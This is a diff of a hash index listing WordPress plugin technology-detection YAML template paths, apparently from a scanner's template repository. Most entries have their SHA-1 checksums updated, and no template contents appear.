+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
+http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
